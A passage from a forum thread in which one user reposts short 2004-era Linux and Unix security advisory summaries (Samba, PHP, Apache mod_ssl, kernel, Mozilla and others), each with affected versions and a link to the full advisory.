2 net-misc/openswan < 2.1.4 >= 2.1.4
== 1.0.6_rc1
3 net-misc/strongswan < 2.1.3 >= 2.1.3
4 net-misc/super-freeswan <= 1.99.7.3 Vulnerable!

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4519.html

Regards

eddie


----------



## eddie5659

dhcp-3.0.1rc14-1 is now available. This release fixes a
buffer overflow vulnerability in the Fedora Core 2 dhcp-3.0.1rc12-*.

*Affected products:

Product : Fedora Core 2
Name : dhcp
Version : 3.0.1rc14

*

http://www.linuxsecurity.com/advisories/fedora_advisory-4520.html

Regards

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of your
Fedora Core Linux operating system. The kernel handles the basic functions
of the operating system: memory allocation, process allocation, device
input and output, etc.

Numerous problems referencing userspace memory were identified in several
device drivers by Al Viro using the sparse tool

*Affected product:

Product : Fedora Core 1
Name : kernel
Version : 2.4.22

*

http://www.linuxsecurity.com/advisories/fedora_advisory-4521.html

Regards

eddie


----------



## eddie5659

Georgi Guninski discovered a buffer overflow bug in Apache's mod_proxy
module, whereby a remote user could potentially cause arbitrary code
to be executed with the privileges of an Apache httpd child process
(by default, user www-data). Note that this bug is only exploitable
if the mod_proxy module is in use.

*For the current stable distribution (woody), this problem has been
fixed in version 1.3.26-0woody5.

For the unstable distribution (sid), this problem has been fixed in
version 1.3.31-2.
*

http://www.linuxsecurity.com/advisories/debian_advisory-4522.html

Regards

eddie


----------



## eddie5659

GNATS is a freely available bug tracking system used by Unix-based operating systems. GNATS version 4.0 is vulnerable to a format string attack. A remote attacker could use this vulnerability to execute arbitrary commands on the system.

*Platforms Affected:

Various: Unix Any version 
Yngve Svendsen and Gerald Pfeifer: GNATS 4.0 *

http://xforce.iss.net/xforce/xfdb/16517

Regards

eddie


----------



## eddie5659

Pavuk is a Web content mirror program for Unix and Linux operating systems. Pavuk versions 0.9.28-rl and earlier are vulnerable to a stack-based buffer overflow, caused by improper bounds checking in the Location: header. By sending a specially-crafted Location: header in a '305 Use Proxy' HTTP Status Code, a remote attacker, in control of a malicious Web server, could overflow a buffer and execute arbitrary code on the vulnerable system.

*Platforms Affected:

kernel.org: Linux Any version 
Pavuk Open Source Developent: Pavuk 0.9.28-rl and prior 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16551

Regards

eddie


----------



## eddie5659

The eupdatedb utility in esearch creates a file in /tmp without first
checking for symlinks. This makes it possible for any user to create
arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-portage/esearch <= 0.6.1 >= 0.6.2
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4530.html

Regards

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of any
Linux operating system. The kernel handles the basic functions
of the operating system: memory allocation, process allocation, device
input and output, etc.

During an audit of the Linux kernel, SUSE discovered a flaw in the
Linux kernel that inappropriately allows an unprivileged user to
change the group ID of a file to his/her own group ID.

*Product : Fedora Core 2
Name : kernel
Version : 2.6.6
Release : 1.435.2.3
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4532.html

Regards

eddie


----------



## eddie5659

Mailman is software to help manage email discussion lists, much like
Majordomo and Smartmail. Unlike most similar products, Mailman gives
each mailing list a webpage, and allows users to subscribe,
unsubscribe, etc. over the Web. Even the list manager can administer
his or her list entirely from the Web. Mailman also integrates most
things people want to do with mailing lists, including archiving, mail
<-> news gateways, and so on.

*Name : mailman
Version : 2.1.5 
Release : 7 
Summary : Mailing list manager with built in Web access.
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4533.html

Regards

eddie


----------



## eddie5659

Rsync before 2.6.1 does not properly sanitize paths when running a
read/write daemon without using chroot. This could allow a remote attacker
to write files outside of the module's "path", depending on the privileges
assigned to the rsync daemon. Users not running an rsync daemon, running a
read-only daemon, or running a chrooted daemon are not affected by this
issue.

*Name : rsync
Version : 2.5.7 
Release : 5.fc1  
Summary : A program for synchronizing files over a network.
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4534.html

Regards

eddie


----------



## eddie5659

wvWare is a library designed to load and parse Microsoft Word files on Unix-based operating systems. wvWare versions 0.7.4, 0.7.5, 0.7.6, and 1.0.0 are vulnerable to a buffer overflow, caused by a improper bounds checking in the DateTime field of the wvHandleDateTimePicture function in the wvWare library. If a remote attacker creates a specially-crafted document and persuades the user to open the document in HTML mode while using an application that uses the wv library, the attacker could overflow a buffer and execute arbitrary code on the system with privileges of the application the uses the library.

*Platforms Affected:

kernel.org: Linux Any version 
SourceForge.net: wvWare 0.7.4 through 0.7.6 
SourceForge.net: wvWare 1.0.0 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/16660

Regards

eddie


----------



## eddie5659

This update fixes several security vulnerabilities in the Linux Kernel
shipped with EnGarde Secure Linux, most notably the "fsave/frstor"
vulnerability (CAN-2004-0554) and an information leak in the e1000
driver (CAN-2004-0535).

*Guardian Digital products affected by this issue include:

EnGarde Secure Community 2
EnGarde Secure Professional v1.5
*

http://www.linuxsecurity.com/advisories/engarde_advisory-4555.html

Regards

eddie


----------



## eddie5659

PHP is a well known, widely-used scripting language often used within
web server setups.
Stefan Esser found a problem with the "memory_limit" handling of PHP which
allows remote attackers to execute arbitrary code as the user running
the PHP interpreter. This problem has been fixed. Additionally a
problem within the "strip_tags" function has been found and fixed which
allowed remote attackers to inject arbitrary tags into certain web
browsers, issuing XSS related attacks.

*Affected products:

8.0, 8.1, 8.2, 9.0, 9.1,
SuSE Linux Enterprise Server 8,
 SuSE Linux Office Server,
UnitedLinux 1.0
*

http://www.linuxsecurity.com/advisories/suse_advisory-4556.html

Regards

eddie


----------



## eddie5659

Stefan Esser discovered a remotely exploitable vulnerability in PHP
where a remote attacker could trigger a memory_limit request
termination in places where an interruption is unsafe. This could be
used to execute arbitrary code.

As well, Stefan Esser also found a vulnerability in the handling of
allowed tags within PHP's strip_tags() function. This could lead to
a number of XSS issues on sites that rely on strip_tags(); however,
this only seems to affect the Internet Explorer and Safari browsers

*Affected versions:

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4557.html

Regards

eddie


----------



## eddie5659

A vulnerability in racoon prior to version 20040408a would allow a
remote attacker to cause a DoS (memory consumption) via an ISAKMP
packet with a large length field.

Another vulnerability in racoon was discovered where, when using RSA
signatures, racoon would validate the X.509 certificate but would not
validate the signature. This can be exploited by an attacker sending
a valid and trusted X.509 certificate and any private key. Using this,
they could perform a man-in-the-middle attack and initiate an
unauthorized connection. This has been fixed in ipsec-tools 0.3.3.

*Affected versions: 10.0
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4558.html

Regards

eddie


----------



## eddie5659

Thomas Walpuski discovered a vulnerability in the X.509 handling of
super-freeswan, openswan, strongSwan, and FreeS/WAN with the X.509
patch applied. This vulnerability allows an attacker to make up their
own Certificate Authority that can allow them to impersonate the
identity of a valid DN. As well, another hole exists in the CA
checking code that could create an endless loop in certain instances

*Affected versions

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4559.html

Regards

eddie


----------



## eddie5659

A buffer overflow vulnerability exists in the wv library that can allow
an attacker to execute arbitrary code with the privileges of the user
running the vulnerable application.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/wv < 1.0.0-r1 >= 1.0.0-r1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4560.html

Regards

eddie


----------



## eddie5659

A flaw has been discovered in 2.6 series Linux kernels that allows an
attacker to send a malformed TCP packet, causing the affected kernel
to possibly enter an infinite loop and hang the vulnerable machine.

*Affected packages
=================

-------------------------------------------------------------------
Kernel / Unaffected / Remerge
-------------------------------------------------------------------
1 aa-sources ............... >= 2.6.5-r5 ...................... YES
2 ck-sources ............... >= 2.6.7-r2 ...................... YES
3 gentoo-dev-sources ....... >= 2.6.7-r7 ..........................
4 hardened-dev-sources ..... >= 2.6.7-r1 ..........................
5 hppa-dev-sources ....... >= 2.6.7_p1-r1 .........................
6 mips-sources ............ *>= 2.6.4-r4 ..........................
.......................... >= 2.6.7-r1 ..........................
7 mm-sources ............... >= 2.6.7-r4 ...................... YES
8 pegasos-dev-sources ...... >= 2.6.7-r1 ..........................
9 rsbac-dev-sources ........ >= 2.6.7-r1 ..........................
10 uclinux-sources ........ >= 2.6.7_p0-r1 .........................
11 usermode-sources ......... >= 2.6.6-r2 ..........................
12 win4lin-sources .......... >= 2.6.7-r1 ..........................
13 xbox-sources ............. >= 2.6.7-r1 ..........................
14 development-sources ...... Vulnerable! ..........................*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4561.html

Regards

eddie


----------



## eddie5659

Multiple security vulnerabilities, potentially allowing remote code
execution, were found and fixed in PHP.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-php/php <= 4.3.7-r1 >= 4.3.8
2 dev-php/mod_php <= 4.3.7-r1 >= 4.3.8
3 dev-php/php-cgi <= 4.3.7-r1 >= 4.3.8
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4562.html

Regards

eddie


----------



## eddie5659

Issues have been discovered in the following protocol dissectors:

* The iSNS dissector could make Ethereal abort in some cases. (0.10.3 - 0.10.4) CAN-2004-0633
* SMB SID snooping could crash if there was no policy name for a handle. (0.9.15 - 0.10.4) CAN-2004-0634
* The SNMP dissector could crash due to a malformed or missing community string. (0.8.15 - 0.10.4) CAN-2004-0635

*Product : Fedora Core 2
Name : ethereal
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4563.html

Regards

eddie


----------



## eddie5659

This announcement fixes the following vulnerabilities:

Vicam USB driver denial of service 
OSS denial of service 
ISO-9660 buffer overflow vulnerability
R128 DRI local privileges escalation 
do_fork memory leak 
Infoleak on filesystems 
Buffer overflow at panic state 
Sparse bugs

http://www.linuxsecurity.com/advisories/conectiva_advisory-4564.html

Regards

eddie


----------



## eddie5659

PHP[1] is a very popular scripting language used by web servers to
offer dynamic content.

Stefan Esser noted[2] a vulnerability[3] in php code so that a remote
attacker could force php to hit memory_limit in unsafe places which
would lead to a possible execution of arbitrary code.

He also found[4] out that the strip_tags() function, often used as a
validator for user input, could allow tags containing the null char

*PACKAGE : php4*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4565.html

Regards

eddie


----------



## eddie5659

Webmin[1] is an often used web-based administration interface for
Unix systems.

Keigo Yamazaki reported[2] a vulnerability[3] in webmin that would
allow unauthenticated users to obtain read access to a module's
configuration.

*PACKAGE : webmin*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4566.html

Regards

eddie


----------



## eddie5659

Nessus is a freely available broad-spectrum vulnerability assessment tool for Unix and Linux-based operating systems. Nessus version 2.0.11 and possibly earlier versions are vulnerable to a race condition in nessus-adduser, which allows users to add a nessusd user. If the TMPDIR environment variable is not configured, a local attacker could exploit this vulnerability to gain elevated privileges on the system

*Platforms Affected:

kernel.org: Linux Any version 
Nessus: Nessus 2.0.11 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16768

Regards

eddie


----------



## eddie5659

Pavuk is a Web content mirror program for Unix and Linux operating systems. Pavuk is vulnerable to a buffer overflow, caused by a vulnerability when handling digest authentication. A remote attacker exploit this vulnerability to overflow a buffer and execute arbitrary code on the vulnerable system, with privileges of the user running Pavuk.

*Platforms Affected:

Gentoo Technologies, Inc.: Gentoo Linux Any version 
Pavuk Open Source Developent: Pavuk Any version *

http://xforce.iss.net/xforce/xfdb/16807

Regards

eddie


----------



## eddie5659

PowerPortal is a content management portal for Unix-based platforms. PowerPortal version 1.3 is vulnerable to cross-site scripting, caused by improper filtering of user-supplied input in the private message module. A remote attacker could send a specially-crafted private message containing malicious code to the message title field, which would be executed in the victim's Web browser within the security context of the hosting site, once the message has been viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

*Platforms Affected:

John H: PowerPortal 1.3 
Various: Unix Any version *

http://xforce.iss.net/xforce/xfdb/16838

Regards

eddie


----------



## eddie5659

Oracle8i and Oracle9i database servers and Oracle Application Server version 9iAS Release 9.0.2.0.1 could allow a local attacker to gain elevated privileges on the server. By default, Oracle libraries are installed owned by oracle. A local attacker with an oracle, ias, iasr2 or iasdb account could gain root privileges on the server.

*Platforms Affected:

Hewlett-Packard Company: HP-UX Any version 
kernel.org: Linux Any version 
Oracle Corporation: Oracle8i Any version 
Oracle Corporation: Oracle9i Any version 
Oracle Corporation: Oracle9i Application Server Release 2 9.0.2.0.1 
Sun Microsystems: Solaris Any version 
*

http://xforce.iss.net/xforce/xfdb/16839

Regards

eddie


----------



## eddie5659

Two vulnerabilities were discovered in libapache-mod-ssl:

CAN-2004-0488 - Stack-based buffer overflow in the
ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl,
when mod_ssl is configured to trust the issuing CA, may allow remote
attackers to execute arbitrary code via a client certificate with a
long subject DN.

CAN-2004-0700 - Format string vulnerability in the ssl_log function
in ssl_engine_log.c in mod_ssl 2.8.19 for Apache 1.3.31 may allow
remote attackers to execute arbitrary messages via format string
specifiers in certain log messages for HTTPS.

*Package : libapache-mod-ssl*

http://www.linuxsecurity.com/advisories/debian_advisory-4609.html

Regards

eddie


----------



## eddie5659

There is a vulnerability in sendmail that can be exploited 
to cause a denial-of-service condition and could allow a 
remote attacker to execute arbitrary code with the privileges 
of the sendmail daemon, typically root.

*Vulnerable Supported Versions

System Binaries
----------------------------------------------------------------------
OpenServer 5.0.6 Sendmail distribution
OpenServer 5.0.7 Sendmail distribution	*

http://www.linuxsecurity.com/advisories/caldera_advisory-4611.html

Regards

eddie


----------



## eddie5659

tcpdump is a widely-used network sniffer.

The issues with tcpdump are present only on UnixWare 7.1.3up and 
not on previous versions of UnixWare 7.1.3 or earlier including
Open Unix 8.0.0, because the version of tcpdump UnixWare 7.1.3 
and before is 3.4a5 and it doesn't contain these issues.

Remote attackers could potentially exploit these 
vulnerabilities by sending carefully-crafted network packets 
to a victim. If the victim is running tcpdump, these packets 
could result in a denial of service, or possibly execute 
arbitrary code.

*Vulnerable Supported Versions

System Binaries
----------------------------------------------------------------------
UnixWare 7.1.3up /usr/sbin/tcpdump

*

http://www.linuxsecurity.com/advisories/caldera_advisory-4612.html

Regards

eddie


----------



## eddie5659

Updated sox packages that fix buffer overflows in the WAV file handling
code are now available

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-4613.html

Regards

eddie


----------



## eddie5659

An updated ipsec-tools package that fixes verification of X.509
certificates in racoon is now available.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, ppc64, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-4614.html

Regards

eddie


----------



## eddie5659

iDefense discovered a buffer overflow vulnerability in the wv package
which could allow an attacker to execute arbitrary code with the
privileges of the user running the vulnerable application.

*Affected versions: 10.0, 9.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4615.html

Regards

eddie


----------



## eddie5659

The OpenOffice.org office suite contains an internal libneon library
which allows it to connect to WebDAV servers. This internal library
is subject to the same vulnerabilities that were fixed in libneon
recently. These updated packages contain fixes to libneon to
correct the several format string vulnerabilities in it, as well as
a heap-based buffer overflow vulnerability.

*Affected versions: 10.0
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4616.html

Regards

eddie


----------



## eddie5659

Two buffer overflows vulnerabilities were found in Samba, potentially
allowing the remote execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-fs/samba <= 3.0.4-r1 >= 3.0.5

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4617.html

Regards

eddie


----------



## eddie5659

Multiple vulnerabilities in phpMyAdmin may allow a remote attacker with
a valid user account to alter configuration variables and execute
arbitrary PHP code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-db/phpmyadmin <= 2.5.7 >= 2.5.7_p1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4618.html

Regards

eddie


----------



## eddie5659

SoX contains two buffer overflow vulnerabilities in the WAV header
parser code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-sound/sox <= 12.17.4-r1 >= 12.17.4-r2

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4619.html

Regards

eddie


----------



## eddie5659

Samba[1] provides SMB/CIFS services (such as file and printer
sharing) used by clients compatible with Microsoft Windows(TM).

Evgeny Demidov noticed that the internal routine used by the Samba
Web Administration Tool (SWAT) to decode the base64 data during HTTP
basic authentication is subject[2] to a buffer overrun caused by an
invalid base64 character. This same code is used internally to
decode the sambaMungedDial attribute value when using the ldapsam
passdb backend and to decode input given to the ntlm_auth tool.

Another buffer overrun problem[3] has been located in the code used
to support the 'mangling method = hash' smb.conf option. Please be
aware that the default setting for this parameter is 'mangling method
= hash2' and therefore not vulnerable.

http://www.linuxsecurity.com/advisories/conectiva_advisory-4620.html

Regards

eddie


----------



## eddie5659

ripMIME is an email filter, developed by Paul L Daniels, which is included as part of the XaMime and the Inflex email virus scanning utilities. ripMIME versions prior to 1.3.2.3 could allow a remote attacker to bypass email and content filters. ripMIME fails to properly extract specific MIME encoded data from an attachment, if the data consists of invalid characters. A remote attacker could exploit this vulnerability to bypass certain email and various filtering applications, such as antivirus programs.

*Platforms Affected:

kernel.org: Linux Any version 
PLDaniels: ripMIME prior to 1.3.2.3 
Various: Unix Any version*

http://xforce.iss.net/xforce/xfdb/16867

Regards

eddie


----------



## eddie5659

sharutils contains two buffer overflow vulnerabilities that could lead
to arbitrary code execution.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-arch/sharutils <= 4.2.1-r9 >= 4.2.1-r10
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4883.html

Regards

eddie


----------



## eddie5659

A security vulnerability has been located in Samba 2.2.x <= 2.2.11 and
Samba 3.0.x <= 3.0.5. A remote attacker may be able to gain access to
files which exist outside of the share's defined path. Such files must
still be readable by the account used for the connection.

*Affected versions: Trustix Secure Linux 1.5
Trustix Secure Linux 2.0
*

http://www.linuxsecurity.com/advisories/trustix_advisory-4884.html

Regards

eddie


----------



## eddie5659

"This is a maintenance release that in addition to over 50 non-critical
bug fixes, addresses a problem with GPC input processing. This release
also re-introduces ability to write GIF images via the bundled GD
extension."

*Affected versions: Trustix Secure Linux 2.1
Trustix Operating System - Enterprise Server 2
*

http://www.linuxsecurity.com/advisories/trustix_advisory-4885.html

Regards

eddie


----------



## eddie5659

Freenet6 is a client designed to configure an IPv6 tunnel to the Freenet6.net. Freenet6 could allow a remote attacker to obtain username and password information. The tspc.conf configuration file in Freenet6 is world-readable, which could allow a remote attacker to access this file and obtain username and password information that is used to connect to the IPv6 tunnelbroker Freenet6.net

*Platforms Affected:

Debian Project: Debian Linux 3.0 
Hexago: Freenet6 Any version 
kernel.org: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/17544

Regards

eddie


----------



## eddie5659

The syscons CONS_SCRSHOT ioctl(2) does insufficient validation of
its input arguments. In particular, negative coordinates or large
coordinates may cause unexpected behavior.

*Affects:

FreeBSD 5.x releases*

http://www.linuxsecurity.com/advisories/freebsd_advisory-4904.html

Regards

eddie


----------



## eddie5659

Utilities included in old Netpbm versions are vulnerable to multiple
temporary files issues, potentially allowing a local attacker to
overwrite files with the rights of the user running the utility.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/netpbm <= 9.12-r4 >= 10.0
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4898.html

Regards

eddie


----------



## eddie5659

Two bugs in PHP may allow the disclosure of portions of memory and
allow remote attackers to upload files to arbitrary locations.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-php/php < 4.3.9 >= 4.3.9
2 dev-php/mod_php < 4.3.9 >= 4.3.9
3 dev-php/php-cgi < 4.3.9 >= 4.3.9
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4911.html

Regards

eddie


----------



## eddie5659

The vulnerabilities allow remote attackers to cause a denial of service of sauid server services.

*Affected Products :

- Turbolinux Appliance Server 1.0 Hosting Edition
- Turbolinux Appliance Server 1.0 Workgroup Edition
- Turbolinux 8 Server
- Turbolinux 8 Workstation
- Turbolinux 7 Server
- Turbolinux 7 Workstation
*

http://www.linuxsecurity.com/advisories/turbolinux_advisory-4905.html

Regards

eddie


----------



## eddie5659

New kernels are available for Mandrakelinux 10.0 that fix the
following bugs and/or add the following enhancements:

The 2.4 kernel adds prism54 support.

The 2.6 kernel adds atiixp support and ia64 support. It fixes alsa
intel8x0 (specifically for nvidia chipsets). It includes the Megaraid
newgen 2.20.3.1 (a new driver that replaces the old megaraid), adds
pwc fork 0.3 (a new driver), 3w-9xxx (new driver), and updates ide
piix/libata (supports ICH6, adds NVIDIA, Promise, Sis, and Vitesse
chipset support). Driver updates of Bcm5700, qla, and ieee1394 were
also included, as well as xfs fixes.

*Affected versions: 10.0
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4906.html

Regards

eddie


----------



## eddie5659

The Samba server, which allows to share files and resources via
the SMB/CIFS protocol, contains a bug in the sanitation code of path
names which allows remote attackers to access files outside of the
defined share. In order to access these files, they must be readable
by the account used for the SMB session.

*Affected products:

8.1, 8.2, 9.0
SUSE Linux Enterprise Server 8
SUSE Linux Desktop 1.0

*

http://www.linuxsecurity.com/advisories/suse_advisory-4907.html

Regards

eddie


----------



## eddie5659

This update fixes an information leakage problem when printing to SMB
shares requiring authentication

*Product : Fedora Core 2
Name : cups
Version : 1.1.20
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4908.html

Regards

eddie


----------



## eddie5659

Buffer overflows exist in the telnet client and daemon provided by
netkit-telnetd, which could possibly allow a remote attacker to gain
root privileges and compromise the system.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/netkit-telnetd <= 0.17-r3 >= 0.17-r4
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4909.html

Regards

eddie


----------



## eddie5659

Julian Reschke reported a problem in mod_dav of Apache 2 in connection
with a NULL pointer dereference. When running in a threaded model,
especially with Apache 2, a segmentation fault can take out a whole
process and hence create a denial of service for the whole server.

*Package : libapache-mod-dav
*

http://www.linuxsecurity.com/advisories/debian_advisory-4910.html

Regards

eddie


----------



## eddie5659

During the last months a number of security problems have been fixed
in Mozilla and Mozilla based brwosers. These include:

- CAN-2004-0718: content in unrelated windows could be modified
- CAN-2004-0722: integer overflow in the SOAPParameter object constructor
- CAN-2004-0757: heap-based buffer overflow in the SendUidl of POP3 code
- CAN-2004-0758: denial-of-service with malicious SSL certificates
- CAN-2004-0759: read files via JavaScript
- CAN-2004-0760: MIME code handles %00 incorrectly
- CAN-2004-0761: spoofing of security lock icon
- CAN-2004-0762: manipulation of XPInstall Security dialog box
- CAN-2004-0763: spoofing of SSL certificates by using redirects and
JavaScript
- CAN-2004-0764: hijacking the user interface via the "chrome" flag and
XML User Interface Language (XUL) files
- CAN-2004-0765: spoofing SSL certificates due to incorrecting comparsion
of hostnames
- CAN-2004-0902: Several heap based buffer overflows in Mozilla Browsers.
- CAN-2004-0903: Stack-based buffer overflow in the writeGroup function
in vcard handling.
- CAN-2004-0904: Overflow in BMP bitmap decoding.
- CAN-2004-0905: Crossdomain scripting and possible code execution by
javascript drag and drop.
- CAN-2004-0906: XPI Installer sets insecure permissions, allowing local
users to overwrite files of the user.
- CAN-2004-0908: Allow untrusted javascript code to read and write to the
clipboard.
- CAN-2004-0909: Allow remote attackers to trick the user into performing
dangerous operations by modifying security relevant dialog boxes.

*Affected products:

8.1, 8.2, 9.0, 9.1
SUSE Linux Enterprise Server 8, 9
SUSE Linux Desktop 1.0
*

http://www.linuxsecurity.com/advisories/suse_advisory-4912.html

Regards

eddie


----------



## eddie5659

Stefan Nordhausen has identified a local security hole in net-acct, a
user-mode IP accounting daemon. Old and redundant code from some time
way back in the past created a temporary file in an insecure fashion.

*Package : net-acct*

http://www.linuxsecurity.com/advisories/debian_advisory-4913.html

Regards

eddie


----------



## eddie5659

Updated XFree86 packages that fix several security issues in libXpm, as
well as other bug fixes, are now available for Red Hat Enterprise Linux 2.1.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
*

http://www.linuxsecurity.com/advisories/redhat_advisory-4914.html

Regards

eddie


----------



## eddie5659

Carnegie Mellon University's Cyrus-SASL library could allow a local attacker to supply a specially-crafted SASL_PATH environment variable and possibly execute arbitrary code on the system.

*Platforms Affected:

Carnegie Mellon University: Cyrus-SASL Any version 
Gentoo Technologies, Inc.: Gentoo Linux Any version 
MandrakeSoft, Inc.: Mandrake Linux 10.0 
MandrakeSoft, Inc.: Mandrake Linux 9.2 
MandrakeSoft, Inc.: Mandrake Linux Corporate Server 2.1 
Red Hat, Inc.: Red Hat Advanced Workstation 2.1 
Red Hat, Inc.: Red Hat Desktop 3 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1AS 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1ES 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1WS 
Red Hat, Inc.: Red Hat Enterprise Linux 3AS 
Red Hat, Inc.: Red Hat Enterprise Linux 3ES 
Red Hat, Inc.: Red Hat Enterprise Linux 3WS 
*

http://xforce.iss.net/xforce/xfdb/17643

Regards

eddie


----------



## eddie5659

Multiple heap-based overflows have been found in the tiff library image
decoding routines, potentially allowing to execute arbitrary code with
the rights of the user viewing a malicious image.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable /  Unaffected
-------------------------------------------------------------------
1 media-libs/tiff < 3.6.1-r2 >= 3.6.1-r2
2 media-gfx/xv <= 3.10a-r7 >= 3.10a-r8
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4943.html

eddie


----------



## eddie5659

This update fixes many bugs, mostly in the LDAP backend and the Python
bindings

*Product : Fedora Core 2
Name : libuser
Version : 0.52.5
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4944.html

eddie


----------



## eddie5659

Squid is a high-performance proxy caching server for Web clients,
supporting FTP, gopher, and HTTP data objects. Unlike traditional
caching software, Squid handles all requests in a single,
non-blocking, I/O-driven process. Squid keeps meta data and especially
hot objects cached in RAM, caches DNS lookups, supports non-blocking
DNS lookups, and implements negative caching of failed requests.

*Product : Fedora Core 2
Name : squid
Version : 2.5.STABLE5
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4945.html

eddie


----------



## eddie5659

system-config-users is a graphical utility for administrating
users and groups. It depends on the libuser library.

*Product : Fedora Core 2
Name : system-config-users
Version : 1.2.25
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4946.html

eddie


----------



## eddie5659

WordPress contains HTTP response splitting and cross-site scripting
vulnerabilities.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress < 1.2.1 >= 1.2.1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4947.html

eddie


----------



## eddie5659

CUPS[1] (Common UNIX Printing System) is an open-source, freely
available and cross-platform printing solution for UNIX
environments.

Alvaro Martinez Echevarria found a vulnerability[2] in the CUPS
Internet Printing Protocol (IPP) implementation that allows remote
attackers to make CUPS stop listening on the IPP port by sending an
empty UDP datagram packet to the IPP port, causing a denial of
service situation.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4948.html

eddie


----------



## eddie5659

Samba[1] provides SMB/CIFS services (such as file and printer
sharing) used by clients compatible with Microsoft Windows(TM).

This announcement fixes two denial of service vulnerabilities via
certain malformed requests[2] and via a SAM_UAS_CHANGE request with a
big length value[3] when domain logons are enabled.

It also fixes a problem[4] in the input validation routines used to
convert DOS path names to path names on the Samba host's file system
that could be exploited to gain access to files outside of the
share's path defined by smb.conf.

*RELEVANT
RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4949.html

eddie


----------



## eddie5659

This advisory is an addition to DSA 563-1 and 563-2 which weren't able
to supersede the library on sparc and arm due to a different version
number for them in the stable archive. Other architectures were
updated properly. Another problem was reported in connection with
sendmail, though, which should be fixed with this update as well.

*Package : cyrus-sasl
Vulnerability : unsanitised input*

http://www.linuxsecurity.com/advisories/debian_advisory-4950.html

eddie


----------



## eddie5659

K3b provides a comfortable user interface to perform most CD/DVD
burning tasks. While the experienced user can take influence in all
steps of the burning process the beginner may find comfort in the
